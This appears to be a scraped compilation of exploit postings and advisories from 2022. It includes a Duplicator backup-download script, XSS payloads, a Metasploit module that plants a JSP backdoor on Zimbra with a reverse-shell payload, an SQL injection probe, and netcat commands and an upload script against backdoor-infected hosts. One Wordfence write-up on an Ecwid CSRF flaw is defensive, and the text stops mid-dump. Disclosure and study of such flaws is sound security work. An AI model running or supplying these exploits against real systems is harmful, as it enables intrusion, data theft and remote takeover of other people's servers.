<pre><code>## Title: WordPress Plugin Duplicator 1.4.7.1 - Unauthenticated Backup Download<br />## Author: nu11secur1ty<br />## Date: 08.08.2022<br />## Vendor: https://wordpress.org/<br />## Software: https://wordpress.org/plugins/duplicator/<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1<br /><br /><br /><br />## Description:<br />The WordPress Plugin Duplicator 1.4.7.1 suffers from Unauthenticated<br />Backup Download, after an update from the 1.4.7 version.<br />The attacker can download all archive information from the system by<br />using this vulnerability!<br /><br />Status: CRITICAL<br /><br />[+] Exploit:<br /><br />```python<br />#!/usr/bin/python<br /># Author nu11secur1ty<br />import requests<br />import time<br /><br />vulnerableURL = "http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"<br />archive=input("Give the name of the archive...\n")<br />response = requests.get(vulnerableURL)<br />time.sleep(5)<br />open(archive, "wb").write(response.content)<br />print("Right now, you just downloaded the secret archive =)\n")<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ee11bg)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: Nortek Linear eMerge E3-Series - Account Take Over<br /># Exploit Author: Omar Hashim<br /># Version: 0.32-07p<br /># Vendor home page: https://www.nortekcontrol.com/access-control/<br /># Vendor home page: https://linear-solutions.com/<br /># Authentication Required: No<br /># CVE: CVE-2022-31798<br /><br /># Description<br /> ====================<br />There is a local session fixation that, chained with reflected cross-site<br />scripting, leads to account takeover of admin or less privileged users.<br /><br /># Proof Of Concept:<br /> ====================<br />http://<HOST:PORT>/card_scan.php?No=1337&ReaderNo=1337&CardFormatNo=<img<br />src=x onerror=alert(document.location)><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::FILEFORMAT<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::FileDropper<br /> include Msf::Exploit::Format::RarSymlinkPathTraversal<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)',<br /> 'Description' => %q{<br /> This module creates a RAR file that can be emailed to a Zimbra server<br /> to exploit CVE-2022-30333. If successful, it plants a JSP-based<br /> backdoor in the public web directory, then executes that backdoor.<br /><br /> The core vulnerability is a path-traversal issue in unRAR that can<br /> extract an arbitrary file to an arbitrary location on a Linux system.<br /><br /> This issue is exploitable on the following versions of Zimbra, provided<br /> UnRAR version 6.11 or earlier is installed:<br /><br /> * Zimbra Collaboration 9.0.0 Patch 24 (and earlier)<br /> * Zimbra Collaboration 8.8.15 Patch 31 (and earlier)<br /> },<br /> 'Author' => [<br /> 'Simon Scannell', # Discovery / initial disclosure (via Sonar)<br /> 'Ron Bowes', # Analysis, PoC, and module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-30333'],<br /> ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'],<br /> ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'],<br /> ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'],<br /> ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'],<br /> ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'],<br /> ],<br /> 'Platform' => 'linux',<br /> 'Arch' => 
[ARCH_X86, ARCH_X64],<br /> 'Targets' => [<br /> [ 'Zimbra Collaboration Suite', {} ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',<br /> 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/',<br /> 'TARGET_FILENAME' => nil,<br /> 'DisablePayloadHandler' => false,<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Stance' => Msf::Exploit::Stance::Passive,<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => false,<br /> 'DisclosureDate' => '2022-06-28',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),<br /><br /> # Separating the path, filename, and extension allows us to randomize the filename<br /> OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']),<br /> OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']),<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),<br /> OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]),<br /><br /> # Took this from multi/handler<br /> OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]),<br /> OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ])<br /> ]<br /> )<br /> end<br /><br /> # Generate an on-system filename using datastore options<br /> def generate_target_filename<br /> if 
datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp')<br /> print_warning('TARGET_FILENAME does not end with .jsp, was that intentional?')<br /> end<br /><br /> File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp")<br /> end<br /><br /> # Normalize the path traversal and figure out where it is relative to the web root<br /> def zimbra_get_public_path(target_filename)<br /> # Normalize the path<br /> normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath<br /><br /> # Figure out where it is, relative to the webroot<br /> webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/')<br /> relative_path = normalized_path.relative_path_from(webroot)<br /><br /> # Hopefully, we found a path from the webroot to the payload!<br /> if relative_path.to_s.start_with?('../')<br /> return nil<br /> end<br /><br /> relative_path<br /> end<br /><br /> def exploit<br /> print_status('Encoding the payload as a .jsp file')<br /> payload = Msf::Util::EXE.to_jsp(generate_payload_exe)<br /><br /> # Create a file<br /> target_filename = generate_target_filename<br /> print_status("Target filename: #{target_filename}")<br /><br /> begin<br /> rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload)<br /> rescue StandardError => e<br /> fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")<br /> end<br /><br /> file_create(rar)<br /><br /> print_good('File created! 
Email the file above to any user on the target Zimbra server')<br /><br /> # Bail if they don't want the payload triggered<br /> return unless datastore['TRIGGER_PAYLOAD']<br /><br /> # Get the public path for triggering the vulnerability, terminate if we<br /> # can't figure it out<br /> public_filename = zimbra_get_public_path(target_filename)<br /> if public_filename.nil?<br /> print_warning('Could not determine the public web path, disabling payload triggering')<br /> return<br /> end<br /><br /> register_file_for_cleanup(target_filename)<br /><br /> interval = datastore['CheckInterval'].to_i<br /> print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...")<br /><br /> # This loop is mostly from `multi/handler`<br /> stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i<br /> timeout = datastore['ListenerTimeout'].to_i<br /> loop do<br /> break if session_created?<br /> break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i)<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(public_filename)<br /> )<br /><br /> unless res<br /> fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload')<br /> end<br /><br /> Rex::ThreadSafe.sleep(interval)<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>Description: Cross-Site Request Forgery to Settings/Options Update<br /><br />Affected Plugin: Ecwid Ecommerce Shopping Cart<br /><br />Plugin Slug: ecwid-shopping-cart<br /><br />Affected Versions: <= 6.10.23<br /><br />CVE ID: CVE-2022-2432<br /><br />CVSS Score: 8.8 (High)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Marco Wotschka<br /><br />Fully Patched Version: 6.10.24<br /><br />Ecwid Ecommerce Shopping Cart is a plugin offered by Lightspeed that allows site owners to set up an eCommerce store on a WordPress website and then sync it across various services such as Amazon and social media. It also offers ad integration and access to marketing tools. As part of the plugin’s functionality, there were some more advanced settings that could be managed. Unfortunately, this was implemented insecurely making it possible for attackers to update these settings via a forged request.<br /><br />More specifically, the plugin provides the following admin_post action hooked to the ‘ecwid_update_plugin_params‘ function for that purpose:<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgGRrW4wJp7s4LR8_8W5GZxc55cBM_qW8hSV9n7QFM8MW16sCxG5h4mMrW8RWrLm7fnSqrW70Vz_q4PPYx1W6cGQ985xBh94W4KV7Yy3dzXV8W8bTSFR1sB2J5N60tSb8sMfWmW3Qhxq480ZZDvW6qNFsM4YqZm2W47Fl6f537-gRW8G9Mq25QpGZZW2B_hWM7ZNSZrW8jJ9gf8MSG0pW3c2FG27vDxqyW24KmsZ1HxD3TW6BS5rM4h9TL_W4My4sZ2R5dngW7nrf8C81zMWXW1bBRCq4lYLdfW5Wd9gF2rjpt7W2b9RlV7CGYQ8W4sgGCX98nMgqW1FPwLN10ndByW6yw5YW7rm4RLW1l8_qC5kZvHYW5kyvmH8qjwnbW6cS_Sd2f9WPjM-RF9H50XrYW6d-cP13xx9gWW8Jr_cw26btsNW30S0Xr6gZ41G36ft1 )<br /><br />An initial check in the ‘ecwid_update_plugin_params‘ function ensures that the current user is allowed to manage site options, which is a capability that belongs to administrators. 
However, the nonce check performed shortly after only runs if a nonce is actually set, because the function uses && to combine the presence check (is a wp-nonce parameter in the request?) with the validity check (is that nonce valid?). When the wp-nonce parameter is omitted from the request, the && short-circuits and the verification step never executes. This makes the functionality susceptible to Cross-Site Request Forgery attacks in vulnerable versions.<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgK04W67C43l5f9PlsW1vTzZ291zXDyW7lwxqt5S_SqhW8qMCLs5Vs8hTMlVtTSW5m53W8jPcbS3cs9wpW6xWDF_2xbLMZN7RfvGrn4vjHVXqXzJ3XzQ-1W3SsZJk5qWZY5W7tNvtn7z-pFSW2T45NG8qgmVjW4mZN5T8CCQR4W4X-xkp3MRyMBW8bQV2l1QmfF2W1N6yKt2SKNJxV9hRB01Dr8M4N4LKmRgHfRR-N5f00LN8JsxlVQCRGg9b5QQgVm1Wrc2NkSRpN22l9qWLg4rRW20bJdN7F1XgdN36zDyK1TZzNW6Fk9mV1Y1vkJW7zJyHY4w7XrNW6YPJyL4yxX2PW6qVHnh960fF3W8yZq6C8Nfqr_VkfJpP34G9dBW7J4NVS8plYskN1tn7-6tGsPRW3vNTQ14zxQXMW2gFKwm8yhK853nT51 )<br /><br />This makes it possible for an attacker to change the ecwid_store_id, which uniquely identifies the store and is needed for support requests as well as for embedding the store on other sites. Another site option that could be modified is the site’s ecwid_store_page_id, which is the storefront page in the WordPress installation. Both of these settings may result in a loss of availability of the storefront if changed to an invalid store ID. There are several other settings that could be affected in addition to those two. The plugin does not provide a direct link to the settings page in any of its menus and a warning on the page suggests that modifying these settings may significantly affect the plugin functionality.<br /><br />The Importance of Properly Implementing Nonces<br /><br />Nonces are a critical component used to prevent Cross-Site Request Forgery vulnerabilities. 
As such, it’s important to ensure they are properly implemented throughout plugin and theme code to prevent unauthorized execution of that code. Fortunately, WordPress provides several mechanisms to create and validate proper nonces.<br /><br />Nonce Creation<br /><br />The first step to proper nonce implementation is nonce creation.<br /><br />One option to properly implement nonce creation involves the wp_nonce_url() function. This function expects a target URL as well as an action and an optional nonce name. The nonce will be added to a URL and can be verified by a nonce validation function that is executed in the same or subsequent function. This makes it possible for developers to provide links to perform actions such as deletion of posts with a proper nonce that allows the code to verify that the action was initiated from within the site as opposed to a click on a link elsewhere, such as in an email.<br /><br />An additional option is adding a nonce to a form to secure any submissions originating from that form. The function wp_nonce_field() is frequently used in these cases and expects an action string. This will add a hidden input field to the form. Upon form submission, the created nonce can be checked and verified.<br /><br />Finally, a nonce can also be generated using wp_create_nonce(), which accepts an action string argument and returns just a nonce. This can be implemented in a variety of different ways and allows more flexibility as a developer to implement nonce validation. We frequently see this function contained in HTML on setting pages that is later used to validate the origin of the request when saving those settings.<br /><br />Remember that nonces are specific to individual users and sessions and are invalidated after 24 hours, or on logout.<br /><br />Nonce Validation<br /><br />The second step to proper nonce implementation involves nonce verification. 
A plugin can implement an appropriate nonce on a form or settings update, but without proper validation of that nonce, there won’t be adequate protection.<br /><br />The first option to properly validate a nonce involves the use of the check_admin_referer() function. This function accepts the protected action as well as the name of the nonce as an argument and checks the nonce as well as the referer, thus helping to ensure that the nonce provided is correct and that the request was initiated from an admin page.<br /><br />When implementing an AJAX action, the check_ajax_referer() function can be used. This will verify the nonce but will not check the referer like the check_admin_referer() function does although it will validate that the request is an AJAX request.<br /><br />A final option for validating a nonce is the more general wp_verify_nonce() function. With this function, an action and nonce name will need to be supplied, and it will verify that the proper nonce was set. This provides the most flexible implementation of nonce validation for developers.<br /><br />In the case of today’s disclosure, the nonce was created on the settings form itself with wp_create_nonce():<br /><br />[Please view this code snippet on our blog here.] 
(https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgF42W98C5CQ5NDR3nN58bq_96Ch4zW3GRvs_6bwRX5W3tsvrb2ShCghW3x06W68pRQH9W3Dg71b6v1HrYN1qR5fbY2lRlW1k5j_14xFFJHW7X-WLl1rqWk4W2Xtb8w2ZQV1fW60H5QG1l9dtQW4FrrX83gDD31W6PL9cT6F_6LvW370m6b2hcXrhW87SST67k_CFgW5-p6J61CRPtqW41Q3yy1ZncNXW3tf7LN7M0RtnVB_kYq1ywQZZW5nCmTg91v6g7W7d0m-m6FkNhhW7ZJZnp8SNnfqW8slWGB5dKbwfW6hRPqV27VwPwN6VYg76H73KcW5RSHN32P4qKzW87nrK28tmgf3W9kClqb5c9kpxW4sNhxd6ZtC1NW4W6S6N4tX1hSW8VG37Z822PTvW3vQSg86XJbffMW8y1Kj7SkzW8qWmSB1p6tWz33Jt1 )<br /><br />As you can see, this statement will call wp_verify_nonce() but only if the nonce is set due to the if (isset($_POST['wp-nonce']) check and the use of && in combination with the wp_verify_nonce() function. Therefore, if the nonce is omitted, this check will not take place.<br /><br />[Please view this code snippet on our blog here.] (https://email.wordfence.com/e3t/Ctc/GC+113/cwG7R04/VVHxgx1rX_sqW1H4wDd41pXybW1PHNH54NjWySN4jRWbD5js6JV3Zsc37CgYDJW4r9V7C4zvxxJW8nbMdr8F-cRDW2rwyLJ1CP2WHW4J-5Pl31WzP1W6DVyjb8Z3jqdN4stQLdG_ZkNW4mglnq1G8sRNW5mXcDc3VtGGNW4FY3bS3VJv8bW81wTgx9bFbTPV1C4Hj2mqjn2W34wsp890BqJ4W3mYsyR7j1ZmkW3N5y145YdY3JW1y9Jw7794yXvN8-B_JcFVNZ3W7qmWfy4_SYqlW8phV2n20Y2n1VY28TM2d1DnBVmThSG3kLmm9W3w1Qb8274pyfW3DMgQT1d69drW1Z_vwR8tNJ00W5VhJ9W1WWjw5V21_7j12XCNfW4nmmL65HjtPhW6bzWt73Vyc5XW49_SzN8D05kRW1p_M0l1RcrzgN5kXSx6thPmgW6kq5wb8y9lv7W2wb9d72F0qKFW6RJdQV89RNSpN1_lhTsk65Q51P1 )<br /><br />This serves as an important reminder to not only properly implement nonces and validation checks but also to ensure that the check fails when the nonce value is empty or otherwise not present.<br /><br />As a final important note: never rely on nonce checks alone. Developers should always remember to include a capability check using a function like current_user_can() in order to ensure the user initiating the action is indeed allowed to perform it. 
Nonces should never be used for authentication, authorization or any form of access control as they are simply intended to verify the origin of the request, and do not perform any authorization.<br /><br />Timeline<br /><br />June 24, 2022 – Initial outreach to the plugin developer.<br /><br />July 11, 2022 – We escalate the issue to the WordPress.org plugins team and send them the full disclosure details.<br /><br />July 13, 2022 – The vulnerability is patched in version 6.10.24.<br /><br />Conclusion<br /><br />In today’s post, we covered a vulnerability in the Ecwid Ecommerce Shopping Cart plugin that could be used to trick site administrators into updating plugin settings due to improper nonce verification. The vulnerability was patched by ensuring that a proper nonce was set and by verifying it.<br /><br />Please remember that due to the nature of Cross-Site Request Forgery vulnerabilities, it is not possible to provide adequate protection via the Wordfence firewall without blocking legitimate requests. As such, we highly recommend updating to version 6.10.24 or higher of Ecwid Ecommerce Shopping Cart to ensure that your site is protected against any exploits targeting this vulnerability.<br /><br />If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.<br /><br />If you have any friends or colleagues who are using this plugin, please share this announcement with them and encourage them to update to the latest patched version of Ecwid Ecommerce Shopping Cart as soon as possible.<br /><br /></code></pre>
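The && short-circuit described in the Ecwid advisory above, as an added example that is not Ecwid's, Wordfence's or WordPress's code: stand-ins for wp_create_nonce()/wp_verify_nonce() (an HMAC over the action keyed with a constructed session secret, so the script runs outside WordPress) drive an assumed reconstruction of the vulnerable handler beside a corrected one, with the capability check first as the post recommends. The function names, the $can_manage_options flag, DEMO_ACTION and the three sample requests are assumptions for this demo.

```php
<?php
// Added example (not Ecwid's or WordPress's code). Stand-ins for
// wp_create_nonce()/wp_verify_nonce(): an HMAC over the action keyed with a
// constructed session secret. Real WordPress also binds the nonce to the user
// id and a 12-hour tick window; that detail is omitted here.
const DEMO_SESSION_SECRET = 'constructed-session-secret';
const DEMO_ACTION = 'ecwid_update_plugin_params';

function demo_create_nonce(string $action): string {
    return substr(hash_hmac('sha256', $action, DEMO_SESSION_SECRET), 0, 10);
}

function demo_verify_nonce(string $nonce, string $action): bool {
    return hash_equals(demo_create_nonce($action), $nonce);
}

// Assumed reconstruction of the vulnerable shape the advisory describes: the
// capability check is fine, but wp-nonce is only verified when it is present,
// so a forged request that omits the parameter skips verification entirely.
function ecwid_update_plugin_params_vulnerable(array $post, bool $can_manage_options): string {
    if (!$can_manage_options) {
        return 'rejected (capability)';
    }
    if (isset($post['wp-nonce']) && !demo_verify_nonce($post['wp-nonce'], DEMO_ACTION)) {
        return 'rejected (nonce)';
    }
    return 'settings updated';
}

// Hardened shape: a missing nonce is treated exactly like an invalid one.
function ecwid_update_plugin_params_fixed(array $post, bool $can_manage_options): string {
    if (!$can_manage_options) {
        return 'rejected (capability)';
    }
    $nonce = $post['wp-nonce'] ?? '';
    if ($nonce === '' || !demo_verify_nonce($nonce, DEMO_ACTION)) {
        return 'rejected (nonce)';
    }
    return 'settings updated';
}

// Constructed requests, all arriving in an administrator's browser session:
// a legitimate submission, a tampered nonce, and the CSRF case (no nonce).
$requests = [
    'valid nonce'   => ['wp-nonce' => demo_create_nonce(DEMO_ACTION), 'ecwid_store_id' => '1001'],
    'wrong nonce'   => ['wp-nonce' => '0000000000', 'ecwid_store_id' => '1001'],
    'missing nonce' => ['ecwid_store_id' => '1001'],
];

foreach ($requests as $label => $post) {
    printf("%-14s vulnerable: %-19s fixed: %s\n", $label,
        ecwid_update_plugin_params_vulnerable($post, true),
        ecwid_update_plugin_params_fixed($post, true));
}
```

Run with `php nonce_demo.php`: the first two rows agree (updated, rejected), while the "missing nonce" row shows the vulnerable handler reporting "settings updated" and the fixed one "rejected (nonce)". The fix is the `$nonce === '' ||` clause: absence must fail closed, and the capability check stays in place because, as the post notes, a nonce only proves request origin, not authorization.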
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/76c09bc82984c7f7ef55eb13018e0d87_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Bushtrommel.122<br />Vulnerability: Unauthenticated Remote Command Execution <br />Description: The malware listens on TCP ports 31745 and 1030. Adversaries who can reach infected hosts can run commands made available by the backdoor. The "*RUN" command calls CreateProcess() based on CL input; errors will result in a pop-up dialog on the infected host: "CreateProcess() in function () GetConsoleOuput() failed!". The correct syntax is as follows: *RUN"calc.exe"; successful code execution results in the response "*EVA*" from the backdoored host.<br />Family: Bushtrommel<br />Type: PE32<br />MD5: 76c09bc82984c7f7ef55eb13018e0d87<br />Vuln ID: MVID-2022-0630<br />Disclosure: 08/04/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe x.x.x.x 31745<br />*PASS**RUN"calc.exe"<br />*EVA*<br /><br />C:\>nc64.exe x.x.x.x 31745<br />*PASS**RUN"c:\DOOM.exe"<br />*EVA*<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/76c09bc82984c7f7ef55eb13018e0d87.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Bushtrommel.122<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 31745 and runs an FTP server on port 1030. Attackers who can reach infected systems can log on using any username/password combination. Intruders may then upload executables using the FTP PASV and STOR commands.<br />Family: Bushtrommel<br />Type: PE32<br />MD5: 76c09bc82984c7f7ef55eb13018e0d87<br />Vuln ID: MVID-2022-0629<br />Disclosure: 08/04/2022<br /><br />Exploit/PoC:<br />C:\>nc64.exe 192.168.18.125 1030<br />220 ICS FTP Server ready.<br />USER malvuln<br />331 Password required for malvuln.<br />PASS malvuln<br />230 User malvuln logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,236,165).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />426 Connection closed; Datei C:\TEMP\DOOM.exe kann nicht erstellt werden.<br />CDUP \<br />250 CWD command successful. 
"C:/" is current directory.<br />PASV<br />227 Entering Passive Mode (192,168,18,125,236,172).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />226 File received ok<br /><br /><br />from socket import *<br /><br />MALWARE_HOST="192.168.18.125"<br />PORT=60588<br />DOOM="DOOM.exe"<br /><br />def doit():<br /> s=socket(AF_INET, SOCK_STREAM)<br /> s.connect((MALWARE_HOST, PORT))<br /><br /> f = open(DOOM, "rb")<br /> EXE = f.read()<br /> s.send(EXE)<br /><br /> while EXE:<br /> s.send(EXE)<br /> EXE=f.read()<br /><br /> s.close()<br /><br /> print("By Malvuln");<br /><br />if __name__=="__main__":<br /> doit()<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: online-admission-system 1.0 - unauthenticated SQL Injection<br /># Date: 5-08-2022<br /># Exploit Author: syad<br /># Vendor Homepage: https://www.sourcecodester.com<br /># Software Link: https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html<br /># Version: 1.0<br /># Tested on: Windows 10 + XAMPP 3.2.4<br /># CVE ID : N/A<br /><br /># Description <br /># The eid parameter of edit.php is not validated, which allows unauthenticated SQL Injection<br /><br /><br />import requests<br />import sys<br /><br /># Route traffic through a local intercepting proxy for inspection<br />proxies = {"https": "https://127.0.0.1:8080", "http": "http://127.0.0.1:8080"}<br /><br />def send_request(ip):<br /> x = "http://%s/Student-Admission_0/Student-Admission/?a=edit&eid=8'" %ip<br /> z = requests.get(x,proxies=proxies)<br /> if "You have an error in your SQL syntax" in z.text:<br /> print("[+] Found Sql Injection")<br /><br /><br />if __name__ == "__main__":<br /> try:<br /> ip = sys.argv[1].strip()<br /> except IndexError:<br /> print("[-] Usage %s <ip>" % sys.argv[0])<br /> print("[-] Example: %s 192.168.1.x" % sys.argv[0])<br /> sys.exit(-1)<br /><br /> send_request(ip)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Stored XSS in post_title parameter in WordPress Plugin "Testimonial Slider and Showcase" 2.2.6<br /># Date: 05/08/2022<br /># Exploit Author: saitamang , yunaranyancat , amd_syad<br /># Vendor Homepage: wordpress<br /># Software Link: https://wordpress.org/plugins/testimonial-slider-and-showcase/<br /># Version: 2.2.6<br /># Tested on: Centos 7 apache2 + MySQL<br /><br />WordPress Plugin "Testimonial Slider and Showcase" is prone to a cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Testimonial Slider and Showcase" version 2.2.6 is vulnerable; prior versions may also be affected.<br /><br />Login as Editor > Add testimonial > Under Title inject payload below ; parameter (post_title parameter) > Save Draft > Preview the post<br /><br />payload --> test"/><img/src=""/onerror=alert(document.cookie)><br /><br />The draft post can be viewed using Admin account and XSS will be triggered.<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/783a191e7944e1af84ec0fa96d933f30.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Jokerdoor<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: The malware listens on TCP port 27374. Attackers who can reach an infected system can send a large payload and trigger a classic stack buffer overflow, overwriting the ECX and EIP registers and the structured exception handler (SEH). When connecting, you will get a "connected" server response; then we supply our payload as a parameter prefixed by "DOS".<br />Family: Jokerdoor<br />Type: PE32<br />MD5: 783a191e7944e1af84ec0fa96d933f30<br />Vuln ID: MVID-2022-0628<br />Dropped files: ywwqlwntubs.exe (random names)<br />ASLR: False<br />DEP: False<br />CFG: False<br />Safe SEH: False<br />Disclosure: 08/03/2022<br /><br />Memory Dump:<br />(21f0.2268): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=000a1600 ebp=000a1620 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? ???<br /><br />0:000> .ecxr<br />eax=00000000 ebx=00000000 ecx=41414141 edx=77729d70 esi=00000000 edi=00000000<br />eip=41414141 esp=000a1600 ebp=000a1620 iopl=0 nv up ei pl zr na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246<br />41414141 ?? 
